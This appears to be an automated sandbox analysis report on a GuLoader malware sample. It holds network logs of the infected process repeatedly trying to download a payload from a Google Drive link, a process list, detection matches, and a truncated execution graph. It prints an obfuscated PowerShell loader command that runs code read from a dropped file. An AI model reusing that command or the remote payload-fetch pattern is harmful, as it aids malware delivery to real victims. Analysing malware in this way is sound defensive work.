                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:41 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bKCWfasyLt1GJItKc-lC2A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      36 | 192.168.2.7 | 50005 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:41 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:42 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:42 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-VEeeqPk0IPwpXap_KDYkbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      37 | 192.168.2.7 | 50006 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:42 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:43 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgTTRccEoQgGE4T4VtmxnaoUMcwoxRSyaoeR8C8CVXvqUOB0tFIG7Zsbbys0EH10SY_GzvF0Yi8
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:43 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-2pegk7PAPh3czbgBH2PyyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:43 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="opXmj1tZxGSVQKY0c2dQjg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      38 | 192.168.2.7 | 50007 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:44 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:44 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-0cJtF1ORZ1ngsZIdzsZINg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      39 | 192.168.2.7 | 50008 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:45 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:45 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgSErVEqcdiIYo9SO5Exgcey7DWQfl4gze3x4aZqtQai4FmKic0c3tbf28TPNAM99Vs8W-uvtAk
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:45 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-_bQNRZwhqnKEr4bNaHblDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
2025-01-10 23:50:45 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V5Ld6bzYrnyL-2Vllb8-9w">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 50009 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:50:46 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
2025-01-10 23:50:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:46 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-p-YXX6AA4QTENH1qfFVSZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.7 | 50010 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:50:47 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
2025-01-10 23:50:47 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQpoSdLOOwFCF8-xB6eH5QrKi_F3X152yJCbzpw_xyeDzwmpIoxkbbib5K8mrwvJ6RGSPW81fU
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:47 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-UssDjWYbp9ezv6iBZMfWuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
2025-01-10 23:50:47 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_eUlTkHips3wBERki7SBuw">*{margin:0;padding:0}html,code{font:15px/22px arial


Target ID: 0
Start time: 18:48:42
Start date: 10/01/2025
Path: C:\Users\user\Desktop\Cpfkf79Rzk.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"
Imagebase: 0x400000
File size: 859'890 bytes
MD5 hash: C642619AD2A1AC39867C56CB2F889E78
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 18:48:49
Start date: 10/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)"
Imagebase: 0xa80000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2070497812.0000000008D1A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 3
Start time: 18:48:49
Start date: 10/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 18:49:49
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe"
Imagebase: 0x400000
File size: 859'890 bytes
MD5 hash: C642619AD2A1AC39867C56CB2F889E78
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2638156664.00000000016FA000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 55%, ReversingLabs
Reputation: low
Has exited: false

                                                                                                        Execution Graph

Execution Coverage: 22.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.8%
Total number of Nodes: 1356
Total number of Limit Nodes: 35
3850->3851 3852 4039a0 3851->3852 3853 40398e 3851->3853 3854 406152 3 API calls 3852->3854 3967 4061cb wsprintfW 3853->3967 3855 4039d0 3854->3855 3856 4039ef lstrcatW 3855->3856 3858 406152 3 API calls 3855->3858 3859 40399e 3856->3859 3858->3856 3959 403c4a 3859->3959 3862 405c61 18 API calls 3863 403a21 3862->3863 3864 403ab5 3863->3864 3866 406152 3 API calls 3863->3866 3865 405c61 18 API calls 3864->3865 3867 403abb 3865->3867 3868 403a53 3866->3868 3869 403acb LoadImageW 3867->3869 3872 4062a6 17 API calls 3867->3872 3868->3864 3876 403a74 lstrlenW 3868->3876 3880 405b86 CharNextW 3868->3880 3870 403b71 3869->3870 3871 403af2 RegisterClassW 3869->3871 3875 40140b 2 API calls 3870->3875 3873 403b7b 3871->3873 3874 403b28 SystemParametersInfoW CreateWindowExW 3871->3874 3872->3869 3873->3805 3874->3870 3879 403b77 3875->3879 3877 403a82 lstrcmpiW 3876->3877 3878 403aa8 3876->3878 3877->3878 3881 403a92 GetFileAttributesW 3877->3881 3882 405b59 3 API calls 3878->3882 3879->3873 3885 403c4a 18 API calls 3879->3885 3883 403a71 3880->3883 3884 403a9e 3881->3884 3886 403aae 3882->3886 3883->3876 3884->3878 3887 405ba5 2 API calls 3884->3887 3888 403b88 3885->3888 3968 406284 lstrcpynW 3886->3968 3887->3878 3890 403b94 ShowWindow 3888->3890 3891 403c17 3888->3891 3893 4065ee 3 API calls 3890->3893 3892 4053bf 5 API calls 3891->3892 3894 403c1d 3892->3894 3895 403bac 3893->3895 3896 403c21 3894->3896 3897 403c39 3894->3897 3898 403bba GetClassInfoW 3895->3898 3900 4065ee 3 API calls 3895->3900 3896->3873 3904 40140b 2 API calls 3896->3904 3899 40140b 2 API calls 3897->3899 3901 403be4 DialogBoxParamW 3898->3901 3902 403bce GetClassInfoW RegisterClassW 3898->3902 3899->3873 3900->3898 3903 40140b 2 API calls 3901->3903 3902->3901 3903->3873 3904->3873 3905->3751 3970 406284 lstrcpynW 3906->3970 3908 405c72 3909 405c04 4 API calls 3908->3909 3910 405c78 3909->3910 3911 40369a 3910->3911 3912 406518 5 API calls 3910->3912 3911->3805 3920 406284 lstrcpynW 3911->3920 3918 
405c88 3912->3918 3913 405cb9 lstrlenW 3914 405cc4 3913->3914 3913->3918 3916 405b59 3 API calls 3914->3916 3915 4065c7 2 API calls 3915->3918 3917 405cc9 GetFileAttributesW 3916->3917 3917->3911 3918->3911 3918->3913 3918->3915 3919 405ba5 2 API calls 3918->3919 3919->3913 3920->3785 3921->3752 3923 4038b2 3922->3923 3924 4038a4 CloseHandle 3922->3924 3971 4038df 3923->3971 3924->3923 3929->3795 3930->3804 3932 40606b 3931->3932 3933 40605e 3931->3933 3932->3804 4021 405ed0 3933->4021 3936 405db6 GetTickCount GetTempFileNameW 3935->3936 3937 403357 3936->3937 3938 405dec 3936->3938 3937->3741 3938->3936 3938->3937 3939->3823 3940->3825 3942 405bb3 3941->3942 3943 402f49 3942->3943 3944 405bb9 CharPrevW 3942->3944 3945 406284 lstrcpynW 3943->3945 3944->3942 3944->3943 3945->3829 3947 402e82 3946->3947 3948 402e9a 3946->3948 3949 402e92 3947->3949 3950 402e8b DestroyWindow 3947->3950 3951 402ea2 3948->3951 3952 402eaa GetTickCount 3948->3952 3949->3832 3950->3949 3953 40669a 2 API calls 3951->3953 3954 402eb8 CreateDialogParamW ShowWindow 3952->3954 3955 402edb 3952->3955 3956 402ea8 3953->3956 3954->3955 3955->3832 3956->3832 3957->3838 3958->3840 3960 403c5e 3959->3960 3969 4061cb wsprintfW 3960->3969 3962 403ccf 3963 403d03 18 API calls 3962->3963 3965 403cd4 3963->3965 3964 4039ff 3964->3862 3965->3964 3966 4062a6 17 API calls 3965->3966 3966->3965 3967->3859 3968->3864 3969->3962 3970->3908 3972 4038ed 3971->3972 3973 4038b7 3972->3973 3974 4038f2 FreeLibrary GlobalFree 3972->3974 3975 405996 3973->3975 3974->3973 3974->3974 3976 405c61 18 API calls 3975->3976 3977 4059b6 3976->3977 3978 4059d5 3977->3978 3979 4059be DeleteFileW 3977->3979 3981 405af5 3978->3981 4011 406284 lstrcpynW 3978->4011 3980 4036cd OleUninitialize 3979->3980 3980->3761 3980->3762 3981->3980 3988 4065c7 2 API calls 3981->3988 3983 4059fb 3984 405a01 lstrcatW 3983->3984 3985 405a0e 3983->3985 3986 405a14 3984->3986 3987 405ba5 2 API calls 3985->3987 3989 405a24 lstrcatW 3986->3989 3991 
